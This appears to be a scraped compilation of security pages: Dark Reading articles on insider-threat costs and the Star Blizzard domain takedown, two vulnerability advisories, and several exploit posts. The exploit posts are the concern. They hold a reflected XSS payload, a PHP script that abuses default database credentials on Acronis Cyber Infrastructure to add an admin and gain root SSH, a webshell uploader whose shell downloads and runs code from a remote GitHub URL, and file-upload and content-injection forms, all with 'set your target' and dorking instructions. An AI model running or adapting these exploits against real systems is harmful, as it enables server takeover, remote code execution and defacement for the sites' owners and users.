A growing number of organizations are taking longer to get back on their feet after an attack, and they're paying high price tags to do so — up to $2M or more.

Source: Panther Media GmbH via Alamy Stock Photo

Organizations are seeing staggering increases in cyberattacks that stem from insider threats, with price tags for remediation reaching eyewatering heights of up to $2 million per incident.

According to research from Gurucul — which surveyed more than 400 IT and cybersecurity professionals — organizations are seeing a rising tide when it comes to insider threats. In 2023, 60% of organizations reported insider attacks, but in 2024 this number jumped to 83%. And in a dramatic shift, the number of organizations experiencing six to 10 attacks in the year doubled from 13% to 25%. Overall, almost half of organizations in the Gurucul study said that the occurrence of inside attacks has become more frequent over the past 12 months.

"Cybersecurity professionals define insider threats as risks originating from individuals within an organization who have authorized access to systems and data but misuse that access, either maliciously or unintentionally," Jason Soroko, senior fellow at Sectigo, wrote in an emailed statement to Dark Reading. "This definition encompasses employees, contractors, or partners who, due to complex IT environments, hybrid work models, or the adoption of advanced tools like GenAI, might exploit vulnerabilities."

This could mean a situation in which an employee steals sensitive data, accidentally leaking data after falling for a phishing scam, or ignoring security updates and protocols, ultimately leading to a security breach, he added.

Related:Dark Reading News Desk Live From Black Hat USA 2024

The Gurucul researchers found that the biggest driver of insider attacks are the growing IT complexities that organizations are faced with, which create visibility gaps that are hard to close. Technology is becoming more complex, and more employees are accessing system networks, extending the attack surface and making it more difficult to cybersecurity staff to safeguard. Not just this, but the adoption of new technologies like Internet of Things (IoT), artificial intelligence (AI), cloud services, and software-as-a-service (SaaS) applications play a role as well in the rapid growth rate that is difficult for organizations to keep pace with. 

With the implementation of new technology, these added "layers of complexity" create challenges for existing staff to combat threats, causing IT staff to become overworked and burned out. Nearly 30% of respondents noted that there is insufficient staff to implement and maintain tools and, if there are enough employees to go around, many lack the training and expertise to effectively manage the tools to safeguard networks. The researchers recommended that organizations that struggle with this cut their losses and transition to more intuitive tools that "reduce alert triage and false positives by providing a complete case of evidence with context and advanced behavior analytics."

Related:MITRE Launches AI Incident Sharing Initiative

Gurucul also pointed out that gaps in insider risk management are also to blame. "Weak enforcement policies, including a lack of consequences for employees and insufficient monitoring, were identified by 31% as contributing factors," according to the report. A fifth (20%) of respondents also cited executive management and policy issues as being one of the major obstacles to combating insider threats and implementing effective management tools and strategies.

Ultimately, it's a story that many in the cybersecurity industry have heard before: Executives need to give cyber threats the attention they deserve and support policy frameworks to help combat it; enforcing this mentality on a companywide level is also essential to strengthen mitigation.

**From Insider Attacks to Financial Spiral**

Insider attacks don't just compromise an organization's safety and information — they come with a high price tag, too. 

According to the study, after dealing with an attack of this kind, the cost of remediation for many organizations (32%) ranges from $100,000 to $499,000. And for others, it’s even more costly: 27% of organizations estimate the cost of remediation to range between $500,000 to $1 million, while 21% say that the costs range from $1 million to $2 million.

Related:Microsoft, DOJ Dismantle Russian Hacker Group Star Blizzard

And that's just the financial impact for each individual insider attack an enterprise faces. With many experiencing roughly six to 10 attacks a year, these numbers multiply to a price that is likely just too costly to cough up. 

Those high price tags usually add up due to a variety of activities, such as system restoration, data recovery, legal fees, regulatory fines, and reputational damage control. 

And even if organizations can put money into remediation, their recovery is still slow. Roughly 45% of organizations take a week or longer to get back on their feet after an insider attack. The lengthy recovery time is usually due to the technical challenges that cybersecurity teams face when trying to restore intricate systems, a lack of unified visibility, and siloed security tools. Limited resources, regulatory compliances, and ongoing investigations also play a role in dragging out remediation efforts, keeping companies down while they’re most vulnerable. 

"It's essential for organizations to leverage advanced incident-response solutions that go beyond basic automation," according to the Gurucul researchers. "These solutions integrate dynamic risk-based prioritization, machine learning, and comprehensive contextual analysis to ensure that security teams can focus on the most critical threats, thereby reducing recovery times."

But in the end, prevention is better than reaction: That means educating existing employees (who complain of technical challenges, limited resources, compliance and privacy concerns, among other issues as leading to inadvertent mistakes), while also bringing in new cybersecurity talent so that security teams can effectively do their jobs and safeguard and mitigate against threats.

"Investing in ongoing training and development for cybersecurity teams to build the necessary expertise is crucial to address this challenge," the researchers wrote. "Managed security services can supplement internal capabilities, ensuring that tools are effectively implemented and maintained without overburdening existing staff."

Insider Threat Damage Balloons as Visibility Gaps Widen

The successful disruption of notorious Russian hacker group Star Blizzard's operations arrives one month out from the US presidential election — one of the APT's prime targets.

Source: Enik via Alamy Stock Photo

Microsoft and the US Department of Justice joined forces this week to take down more than 100 domains linked to a Russian-sponsored hacker group known as Star Blizzard.

The advanced persistent threat (APT), active since 2017, has targeted journalists, non-governmental organizations (NGOs), and Russia experts, particularly those supporting Ukraine.

The operation, which dismantled the group’s server infrastructure in the West, is expected to delay the cyberattackers' ability to regroup and operate.

"Today's seizure of 41 internet domains reflects the Justice Department’s cyber strategy in action — using all tools to disrupt and deter malicious, state-sponsored cyber actors," Deputy Attorney General Lisa Monaco said in a statement issued by the DoJ.

Star Blizzard, also referred to as "Cold River" and "Callisto," uses primarily phishing emails to steal login credentials from its targets, and had recently developed its first custom backdoor.

In a partially unsealed indictment, the DoJ also revealed that two FSB officers, Ruslan Peretyatko and Andrey Korinets, were charged last December for their involvement in Star Blizzard espionage campaigns, which have extended to the UK, NATO countries, and Ukraine. The government's affidavit reveals that in the US, the group targeted military contractors, intelligence community personnel, and government agencies, among others.

The Kremlin-sponsored APT is known for its sophisticated evasion techniques, although Microsoft has been following it, and disrupted the group's activities in 2022 and again last year.

"Rebuilding infrastructure takes time, absorbs resources, and costs money," Microsoft noted in a blog post on the most recent takedown. "Today's action is an example of the impact we can have against cybercrime when we work together."

**A Step in Protection as US Election Nears**

The disruption comes at a crucial time, as US officials are on high alert for foreign interference ahead of the upcoming presidential election. With Star Blizzard's status as a tool for advancing Russian interests, including election disruption, Microsoft emphasized that the takedown action directly impacts efforts to protect the US democratic process from external threats.

"Between January 2023 and August 2024, Microsoft observed Star Blizzard target over 30 civil society organizations — journalists, think tanks, and non-governmental organizations (NGOs) core to ensuring democracy can thrive — by deploying spear-phishing campaigns to exfiltrate sensitive information and interfere in their activities. While we expect Star Blizzard to always be establishing new infrastructure, today's action impacts their operations at a critical point in time when foreign interference in US democratic processes is of utmost concern."

**Russian Threat Likely to Persist**

Sean McNee, head of threat research at DomainTools, says he anticipates a dramatic increase in nation-state backed groups turning toward purchasing domains to carry out cyberespionage, and to seed misinformation and disinformation around the US election as well — so the combined DoJ/Microsoft action might just be a drop in the ocean.

"\[The Star Blizzard takedown is a\] huge step in protecting the Internet," he says, but adds it is likely only "scratching the surface" when it comes to FSB or other groups who have purchased domains to seed malignant websites.

"We have found that some domain hosting services sell domain registrations indiscriminately and are not always responsive when notified about malicious content or coordinated misinformation," he explains.

Tom Kellermann, senior vice president of cyber strategy at Contrast Security, warns Russia has "ratcheted up the cyber insurgency" in American cyberspace.

"Russia is cognizant that the soft underbelly of the US is our dependence on technology," he says, pointing out that the Star Blizzard revelations show that "the GRU and a few cybercrime cartels are collaborating in widespread campaigns of infiltration."

He says he is concerned that the resultant backdoors will be used to deploy destructive malware in the coming days, adding threat hunting must be expanded and runtime security must be activated to blunt the Russian campaign.

"Something wicked this way comes," Kellerman says. "The private sector must take this warning seriously."

**About the Author**

Nathan Eddy is a freelance journalist and award-winning documentary filmmaker specializing in IT security, autonomous vehicle technology, customer experience technology, and architecture and urban planning. A graduate of Northwestern University’s Medill School of Journalism, Nathan currently lives in Berlin, Germany.

Microsoft, DOJ Dismantle Russian Hacker Group Star Blizzard

### Impact

If the Parse Server option `allowCustomObjectId: true` is set, an attacker that is allowed to create a new user can set a custom object ID for that new user that exploits the vulnerability and acquires privileges of a specific role.

### Patches

Improved validation for custom user object IDs. Session tokens for existing users with an object ID that exploits the vulnerability are now rejected.

### Workarounds

- Disable custom object IDs by setting `allowCustomObjectId: false` or not setting the option which defaults to `false`.
- Use a Cloud Code Trigger to validate that a new user's object ID doesn't start with the prefix `role:`.

### References

- https://github.com/parse-community/parse-server/security/advisories/GHSA-8xq9-g7ch-35hg
- https://github.com/parse-community/parse-server/pull/9317 (fix for Parse Server 7)
- https://github.com/parse-community/parse-server/pull/9318 (fix for Parse Server 6)

**Exploitability Metrics**

Attack Vector: This metric reflects the context by which vulnerability exploitation is possible. This metric value (and consequently the resulting severity) will be larger the more remote (logically, and physically) an attacker can be in order to exploit the vulnerable system. The assumption is that the number of potential attackers for a vulnerability that could be exploited from across a network is larger than the number of potential attackers that could exploit a vulnerability requiring physical access to a device, and therefore warrants a greater severity.

Attack Complexity: This metric captures measurable actions that must be taken by the attacker to actively evade or circumvent existing built-in security-enhancing conditions in order to obtain a working exploit. These are conditions whose primary purpose is to increase security and/or increase exploit engineering complexity. A vulnerability exploitable without a target-specific variable has a lower complexity than a vulnerability that would require non-trivial customization. This metric is meant to capture security mechanisms utilized by the vulnerable system.

Attack Requirements: This metric captures the prerequisite deployment and execution conditions or variables of the vulnerable system that enable the attack. These differ from security-enhancing techniques/technologies (ref Attack Complexity) as the primary purpose of these conditions is not to explicitly mitigate attacks, but rather, emerge naturally as a consequence of the deployment and execution of the vulnerable system.

Privileges Required: This metric describes the level of privileges an attacker must possess prior to successfully exploiting the vulnerability. The method by which the attacker obtains privileged credentials prior to the attack (e.g., free trial accounts), is outside the scope of this metric. Generally, self-service provisioned accounts do not constitute a privilege requirement if the attacker can grant themselves privileges as part of the attack.

User interaction: This metric captures the requirement for a human user, other than the attacker, to participate in the successful compromise of the vulnerable system. This metric determines whether the vulnerability can be exploited solely at the will of the attacker, or whether a separate user (or user-initiated process) must participate in some manner.

**Vulnerable System Impact Metrics**

Confidentiality: This metric measures the impact to the confidentiality of the information managed by the VULNERABLE SYSTEM due to a successfully exploited vulnerability. Confidentiality refers to limiting information access and disclosure to only authorized users, as well as preventing access by, or disclosure to, unauthorized ones.

Integrity: This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. Integrity of the VULNERABLE SYSTEM is impacted when an attacker makes unauthorized modification of system data. Integrity is also impacted when a system user can repudiate critical actions taken in the context of the system (e.g. due to insufficient logging).

Availability: This metric measures the impact to the availability of the VULNERABLE SYSTEM resulting from a successfully exploited vulnerability. While the Confidentiality and Integrity impact metrics apply to the loss of confidentiality or integrity of data (e.g., information, files) used by the system, this metric refers to the loss of availability of the impacted system itself, such as a networked service (e.g., web, database, email). Since availability refers to the accessibility of information resources, attacks that consume network bandwidth, processor cycles, or disk space all impact the availability of a system.

**Subsequent System Impact Metrics**

Confidentiality: This metric measures the impact to the confidentiality of the information managed by the SUBSEQUENT SYSTEM due to a successfully exploited vulnerability. Confidentiality refers to limiting information access and disclosure to only authorized users, as well as preventing access by, or disclosure to, unauthorized ones.

Integrity: This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. Integrity of the SUBSEQUENT SYSTEM is impacted when an attacker makes unauthorized modification of system data. Integrity is also impacted when a system user can repudiate critical actions taken in the context of the system (e.g. due to insufficient logging).

Availability: This metric measures the impact to the availability of the SUBSEQUENT SYSTEM resulting from a successfully exploited vulnerability. While the Confidentiality and Integrity impact metrics apply to the loss of confidentiality or integrity of data (e.g., information, files) used by the system, this metric refers to the loss of availability of the impacted system itself, such as a networked service (e.g., web, database, email). Since availability refers to the accessibility of information resources, attacks that consume network bandwidth, processor cycles, or disk space all impact the availability of a system.

GHSA-8xq9-g7ch-35hg: Parse Server's custom object ID allows to acquire role privileges

Computer Laboratory Management System 2024 version 1.0 suffers from a cross site scripting vulnerability.

    ## Titles: LMS2024-1.0 XSS-Reflected Information Disclosure## Author: nu11secur1ty## Date: 00/04/2024## Vendor: https://github.com/oretnom23## Software:https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html#google_vignette## Reference: https://portswigger.net/web-security/cross-site-scripting## Description:The value of the username request parameter is copied into the HTMLdocument as plain text between tags. The payload ro2iz<img src=aonerror=alert(1)>xggkt was submitted in the username parameter. This inputwas echoed unmodified in the application's response.STATUS: HIGH- Vulnerability[+]Exploits:- XSS-Reflected:```xssPOST /php-lms/classes/Login.php?f=login HTTP/1.1Host: pwnedhost.comAccept-Encoding: gzip, deflate, brAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/128.0.6613.138 Safari/537.36Connection: closeCache-Control: max-age=0Cookie: PHPSESSID=g61goafu1miq2e737ra7dclqmlOrigin: https://pwnedhost.comX-Requested-With: XMLHttpRequestReferer: https://pwnedhost.com/php-lms/admin/login.phpContent-Type: application/x-www-form-urlencoded; charset=UTF-8Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="128","Chromium";v="128"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Content-Length: 37username=VLVAuyqjro2iz%3cimg%20src%3da%20onerror%3dalert(1)%3exggkt&password=e3I!x1c!Q7```+ [Response]```HTTP/1.1 200 OKDate: Fri, 04 Oct 2024 08:27:39 GMTServer: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4X-Powered-By: PHP/8.2.4Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheAccess-Control-Allow-Origin: *Content-Length: 177Connection: closeContent-Type: text/html; charset=UTF-8{"status":"incorrect","last_qry":"SELECT * from users where username ='VLVAuyqjro2iz<img src=a onerror=alert(1)>xggkt' and password =md5('45ec487cfe5b3bac8e61740ae8dbcd06') "}```## Reproduce:[href](https://www.patreon.com/nu11secur1ty)## Demo PoC:[href](https://www.patreon.com/nu11secur1ty)## Time spent:00:27:00-- System Administrator - Infrastructure EngineerPenetration Testing EngineerExploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and https://www.exploit-db.com/0day Exploit DataBase https://0day.today/home page: https://www.nu11secur1ty.com/hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=                          nu11secur1ty <http://nu11secur1ty.com/>-- System Administrator - Infrastructure EngineerPenetration Testing EngineerExploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and https://www.exploit-db.com/0day Exploit DataBase https://0day.today/home page: https://www.nu11secur1ty.com/hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=                          nu11secur1ty <http://nu11secur1ty.com/>

Computer Laboratory Management System 2024 1.0 Cross Site Scripting

Acronis Cyber Infrastructure version 5.0.1-61 suffers from a cross site request forgery vulnerability.

    =============================================================================================================================================| # Title     : Acronis Cyber Infrastructure 5.0.1-61 CSRF Add ADmin Vulnerability                                                          || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://www.acronis.com/en-eu/products/cyber-infrastructure/                                                                |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] add new admin.[+] Line 83 + 100 +138 + 202 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass AcronisExploit {    private $sshSocket;    private $dbConn;    private $clusterId;        public function __construct() {        // Initialize default values        $this->sshSocket = null;        $this->dbConn = null;        $this->clusterId = null;    }    // Function to add an admin user to PostgreSQL DB    public function addAdminUser($username, $userid, $password) {        echo "Creating admin user $username with userid $userid\n";        // Insert new admin user into the user table        $resQuery = $this->postgresQuery("INSERT INTO \"user\" VALUES('$userid','{}','T',NULL,NULL,NULL,'default');");        if (!$resQuery) return false;        // Insert new admin user into the local_user table        $resQuery = $this->postgresQuery("SELECT MAX(id) FROM \"local_user\";");        if (!$resQuery) return false;                $idLuser = pg_fetch_result($resQuery, 0, 0) + 1;        $resQuery = $this->postgresQuery("INSERT INTO \"local_user\" VALUES('$idLuser','$userid','default','$username',NULL,NULL);");        if (!$resQuery) return false;        // Hash the password        $passwordHash = password_hash($password, PASSWORD_BCRYPT);        echo "Setting password $password with hash $passwordHash\n";        $today = date('Y-m-d');        $resQuery = $this->postgresQuery("INSERT INTO \"password\" VALUES('$idLuser','$idLuser',NULL,'F','$passwordHash',0,NULL,DATE '$today');");        if (!$resQuery) return false;        // Assign admin roles        $idProjectRole = $this->postgresQuery("SELECT id FROM \"project\" WHERE name = 'admin' AND domain_id = 'default';");        $idAdminRole = $this->postgresQuery("SELECT id FROM \"role\" WHERE name = 'admin';");        echo "Assigning the admin roles: $idProjectRole and $idAdminRole\n";        $this->postgresQuery("INSERT INTO \"assignment\" VALUES('UserProject','$userid','$idProjectRole','$idAdminRole','F');");        echo "Successfully created admin user $username with password $password\n";        return true;    }    // Function to run a PostgreSQL query    private function postgresQuery($query) {        $result = pg_query($this->dbConn, $query);        if (!$result) {            echo "PostgreSQL query failed: " . pg_last_error($this->dbConn) . "\n";            return false;        }        return $result;    }    // Function to login to SSH    public function doSshLogin($ip, $user, $sshKey) {        $connection = ssh2_connect($ip, 22);        if (!$connection) {            echo "SSH connection failed\n";            return false;        }        if (ssh2_auth_pubkey_file($connection, $user, $sshKey['public'], $sshKey['private'])) {            $this->sshSocket = $connection;            return true;        } else {            echo "SSH authentication failed\n";            return false;        }    }    // Function to login to Acronis Cyber Infrastructure web portal    public function aciLogin($name, $pwd) {        $postData = json_encode([            'username' => $name,            'password' => $pwd        ]);        $ch = curl_init();        curl_setopt($ch, CURLOPT_URL, "https://target-uri/api/v2/login");        curl_setopt($ch, CURLOPT_POST, true);        curl_setopt($ch, CURLOPT_POSTFIELDS, $postData);        curl_setopt($ch, CURLOPT_HTTPHEADER, [            'Content-Type: application/json',            'X-Requested-With: XMLHttpRequest'        ]);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        $response = curl_exec($ch);        curl_close($ch);        return (strpos($response, '"code":200') !== false);    }    // Function to get the cluster ID    public function getClusterId() {        $ch = curl_init();        curl_setopt($ch, CURLOPT_URL, "https://target-uri/api/v2/clusters");        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        $response = curl_exec($ch);        curl_close($ch);        $data = json_decode($response, true);        if (isset($data['data'][0]['id'])) {            return $data['data'][0]['id'];        }        return null;    }    // Function to generate SSH keys    private function generateSshKeys() {        $privateKey = tempnam(sys_get_temp_dir(), 'ssh_private');        $publicKey = $privateKey . '.pub';        ssh2_genkeypair($privateKey, $publicKey);        return [            'private' => $privateKey,            'public' => $publicKey        ];    }    // Function to upload SSH public key    public function uploadSshKey($sshKey, $clusterId) {        $postData = json_encode([            'key' => $sshKey,            'event' => [                'name' => 'SshKeys',                'method' => 'post',                'data' => [                    'key' => $sshKey                ]            ]        ]);        $ch = curl_init();        curl_setopt($ch, CURLOPT_URL, "https://target-uri/api/v2/$clusterId/ssh-keys");        curl_setopt($ch, CURLOPT_POST, true);        curl_setopt($ch, CURLOPT_POSTFIELDS, $postData);        curl_setopt($ch, CURLOPT_HTTPHEADER, [            'Content-Type: application/json',            'X-Requested-With: XMLHttpRequest'        ]);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        $response = curl_exec($ch);        curl_close($ch);        return (strpos($response, '"task_id"') !== false);    }    // Main exploit function    public function exploit($rhost, $dbPort, $sshPort, $username, $password) {        // Connect to PostgreSQL        $this->dbConn = pg_connect("host=$rhost port=$dbPort dbname=keystone user=vstoradmin password=vstoradmin");        if (!$this->dbConn) {            echo "Could not connect to PostgreSQL database\n";            return false;        }        // Add a new admin user        $newUsername = substr(md5(rand()), 0, 8);        $newPassword = substr(md5(rand()), 0, 16);        $userId = bin2hex(random_bytes(16));        $this->addAdminUser($newUsername, $userId, $newPassword);        // Login to Acronis        if (!$this->aciLogin($newUsername, $newPassword)) {            echo "Failed to login to Acronis\n";            return false;        }        // Get cluster ID        $this->clusterId = $this->getClusterId();        if (!$this->clusterId) {            echo "Failed to get cluster ID\n";            return false;        }        // Generate SSH keys        $sshKey = $this->generateSshKeys();        // Upload SSH public key        if (!$this->uploadSshKey($sshKey['public'], $this->clusterId)) {            echo "Failed to upload SSH public key\n";            return false;        }        // SSH Login        if (!$this->doSshLogin($rhost, 'root', $sshKey)) {            echo "SSH login failed\n";            return false;        }        echo "Exploit successful, SSH session established!\n";        return true;    }}// Example usage$exploit = new AcronisExploit();$exploit->exploit('target-ip', 6432, 22, 'vstoradmin', 'vstoradmin');Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Acronis Cyber Infrastructure 5.0.1-61 Cross Site Request Forgery

Vehicle Service Management System version 1.0 suffers from a WYSIWYG code injection vulnerability.

=============================================================================================================================================  
| # Title     : Vehicle Service Management System 1.0 WYSIWYG code injection vulnerability                                                  |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            |  
| # Vendor    : https://www.kashipara.com/project/php/10641/online-vehicle-service-management-system                                        |  
=============================================================================================================================================

poc :

[+] This payload injects code of your choice into the welcome page or about via TinyMCE is a WYSIWYG editor V: 7.3.0 which is called inside the file /php-spms/classes/Master.php . 

   [+] Line 86 :  Set your Target.

[+] Line 27 :  set your payload.  <textarea name="page[welcome] ===> You can type welcome or about.

[+] save payload as poc.html

[+] payload : 

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>Welcome Page Editor</title>  
    <script src="https://cdn.tiny.cloud/1/dsrqgwhljvccmtuu414smiyefdarsp88j5fxk0uks60iek04/tinymce/7/tinymce.min.js" referrerpolicy="origin"></script>  
</head>  
<body>  
    <main id="main" class="main">  
        <div class="pagetitle">  
          <h1>Welcome Page</h1>  
          <nav>  
              <ol class="breadcrumb">

                             <li class="breadcrumb-item active">Welcome Page</li>  
              </ol>  
          </nav>  
        </div>

        <div id="msg-container"></div>

                <div class="card rounded-0">  
          <div class="card-body rounded-0 pt-4">  
            <div class="container-fluid">  
              <form id="page-form">  
                <textarea name="page[welcome]" cols="30" rows="10" class="form-control tinymce-editor" required>Hacked By indoushka ;</textarea>  
              </form>  
            </div>  
          </div>  
          <div class="card-footer">  
            <div class="col-lg-4 col-md-5 col-sm-10 col-12 mx-auto">  
              <button class="btn btn-block w-100 btn-primary" form="page-form">Update</button>  
            </div>  
          </div>  
        </div>

        <div id="loader" style="display:none;">Loading...</div>  
        <div id="toast"></div>

        <script>  
            // Initialize TinyMCE  
            tinymce.init({  
                selector: 'textarea.tinymce-editor',  
                height: 300,  
                menubar: false,  
                plugins: [  
                  'advlist autolink lists link image charmap print preview anchor',  
                  'searchreplace visualblocks code fullscreen',  
                  'insertdatetime media table paste code help wordcount'  
                ],  
                toolbar: 'undo redo | formatselect | bold italic backcolor | ' +  
                         'alignleft aligncenter alignright alignjustify | ' +  
                         'bullist numlist outdent indent | removeformat | help'  
            });

            // Loader functions  
            function start_loader() {  
                document.getElementById('loader').style.display = 'block';  
            }

            function end_loader() {  
                document.getElementById('loader').style.display = 'none';  
            }

            // Toast function  
            function showMessage(message, type) {  
                const messageDiv = document.getElementById('toast');  
                messageDiv.innerHTML = `<div class="alert alert-${type}">${message}</div>`;  
                setTimeout(() =>        {  
                    messageDiv.innerHTML = '';  
                }, 3000);  
            }

            // Form submit event listener  
            document.getElementById('page-form').addEventListener('submit', function(e) {  
                e.preventDefault(); // Prevent page reload

                // Start loader  
                start_loader();

                const formData = new FormData(this); // Get form data  
                const xhr = new XMLHttpRequest(); // Create new XMLHttpRequest object

                // Set up request  
                xhr.open('POST', 'http://localhost/vservice/classes/Master.php?f=save_page', true);

                // Handle response  
                xhr.onreadystatechange = function() {  
                    if (xhr.readyState === XMLHttpRequest.DONE) {  
                        end_loader();  
                        if (xhr.status === 200) {  
                            const response = JSON.parse(xhr.responseText);  
                            if (response.status === 'success') {  
                                showMessage('Page updated successfully!', 'success');  
                                location.reload(); // Reload the page if successful  
                            } else if (response.status === 'failed' && response.msg) {  
                                showMessage(response.msg, 'error');  
                            } else {  
                                showMessage('An unknown error occurred.', 'error');  
                            }  
                        } else {  
                            showMessage('Error: ' + xhr.statusText, 'error');  
                        }  
                    }  
                };

                // Send the request  
                xhr.send(formData);  
            });  
        </script>  
    </main>  
</body>  
</html>

Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================

Vehicle Service Management System 1.0 WYSIWYG Code Injection

In OpenStack Ironic before 21.4.4, 22.x and 23.x before 23.0.3, 23.x and 24.x before 24.1.3, and 25.x and 26.x before 26.1.0, there is a lack of checksum validation of supplied image_source URLs when configured to convert images to a raw format for streaming.

GHSA-8h22-6qwx-q4w9: OpenStack Ironic fails to verify checksums of supplied image_source URLs

Vehicle Service Management System version 1.0 suffers from a PHP code injection vulnerability.

    =============================================================================================================================================| # Title     : Vehicle Service Management System 1.0 php code injection Vulnerability                                                      || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://www.kashipara.com/project/php/10641/online-vehicle-service-management-system                                        |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This code injects the malicious file in path : http://$target_ip/uploads/[+] save payload as poc.php[+] usage : C:\www\test>php poc.php localhost/vservice[+] payload :<?phpfunction file_upload($target_ip) {    $file_name = "indoushka.php";    $webshell_payload = "<?php        \$url = 'https://raw.githubusercontent.com/indoushka/txt/main/indoushka.txt';        \$ch = curl_init();        curl_setopt(\$ch, CURLOPT_URL, \$url);        curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, true);        \$output = curl_exec(\$ch);        curl_close(\$ch);        if (\$output) {            include 'data://text/plain;base64,' . base64_encode(\$output);        }    ?>";    $post_fields = array(                'save' => '',        'username' => 'az',        'password' => 'az@gt.gt',      'img' => new CURLFile('data://text/plain;base64,' . base64_encode($webshell_payload), 'application/x-php', $file_name),                  'qty' => '1'    );    $ch = curl_init();    curl_setopt($ch, CURLOPT_URL, "http://$target_ip/classes/Users.php?f=save");    curl_setopt($ch, CURLOPT_POST, 1);    curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);    $response = curl_exec($ch);    curl_close($ch);    echo "(+) Shell uploaded successfully.\n";    echo "(+) Access the shell at: http://$target_ip/uploads/\n";}if ($argc != 2) {    echo "(+) Usage: php " . $argv[0] . " <target ip>\n";    echo "(+) Example: php " . $argv[0] . " 10.0.0.1\n";    exit(-1);}$target_ip = $argv[1];file_upload($target_ip);Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Vehicle Service Management System 1.0 Code Injection

Transport Management System version 1.0 suffers from an arbitrary file upload vulnerability.

=============================================================================================================================================  
| # Title     : Transport Management System 1.0 Remote File Upload Vulnerability                                                            |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            |  
| # Vendor    : https://www.kashipara.xyz/download/project/user/2022/202203/kashipara.com_transport-management-syste.zip                    |  
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code uploads a executable malicious file remotely .

[+] Go to the line 6.

[+] Set the target site link Save changes and apply . 

[+] save code as poc.html .

<!DOCTYPE html>  
<html xmlns="http://www.w3.org/1999/xhtml">  
<head profile="http://www.w3.org/2005/10/profile">  
<script data-ad-client="ca-pub-2400875940842439" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>  
<br>  
            <form class="form-horizontal" action="http://127.0.0.1/Transport-Management/newvehicle.php" method="post" enctype="multipart/form-data">

                                <div class="input-group">  
                  <span class="input-group-addon"><b>Registration Number</b></span>  
                  <input id="vehreg" type="text" class="form-control" name="vehregno" placeholder="Reg No">  
                </div>  
                <br> 

                                 <div class="input-group">  
                  <span class="input-group-addon"><b>Chesis No</b></span>  
                  <input id="vehchesis" type="text" class="form-control" name="vehchesis" placeholder="Chesis No">  
                </div>  
                <br> 

                                <div class="input-group">  
                  <span class="input-group-addon"><b>Brand</b></span>  
                  <input id="vehbrand" type="text" class="form-control" name="vehbrand" placeholder="Brand">  
                </div>  
                <br>

                                <div class="input-group">  
                  <span class="input-group-addon"><b>Color</b></span>  
                  <input id="vehcolor" type="text" class="form-control" name="vehcolor" placeholder="Color">  
                </div>  
                <br>

                                 <div class="input-group">  
                  <span class="input-group-addon"><b>Registration Date</b></span>  
                  <input id="vehregdate" type="text" class="form-control" name="vehregdate" placeholder="Registration date">  
                </div>  
                <br>

                                                               <script>  
                      $( function() {  
                        $( "#vehregdate" ).datepicker();  
                      } );  
                </script> 

                                                <br>

                                 <div class="input-group">  
                  <span class="input-group-addon"><b>Description</b></span>  
                     <textarea rows="5" id="draddress" type="text" class="form-control" name="vehdescription" placeholder="Address"> </textarea>

                                  </div>  
                <br>

                                  
                <div class="input-group">  
                  <span class="input-group-addon"><b>Photo</b></span>  
                  <input  type="file" class="form-control" name="file"> 

              </div>

                                                 <br>

                                <div class="input-group">  
                  <input type="submit" name="submit" class="btn btn-success">

                                  </div>

              </form>     
        </div>    
        <div class="col-md-3"></div>

[+] http://127.0.0.1/Transport-Management/vehicle%20picture/hacked.txt

Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================

Transport Management System 1.0 Arbitrary File Upload

Transport Management System version 1.0 suffers from a PHP code injection vulnerability.

